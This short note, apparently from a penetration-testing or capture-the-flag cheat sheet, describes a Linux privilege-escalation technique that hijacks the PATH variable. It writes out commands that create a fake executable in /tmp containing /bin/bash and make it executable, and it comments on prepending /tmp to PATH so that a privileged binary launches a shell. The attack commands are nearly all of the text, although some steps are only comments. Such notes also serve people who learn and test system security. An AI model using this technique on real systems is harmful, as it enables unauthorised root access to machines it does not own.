Exploiting Path Variable
# Get the strings command to get the runtime calls
# Create the executable within /tmp dir
echo "/bin/bash" > "command"
# Give executable permissions
chmod +x "command"
# Amend the PATH env
# Execute it
It will trigger the one within /tmp we created.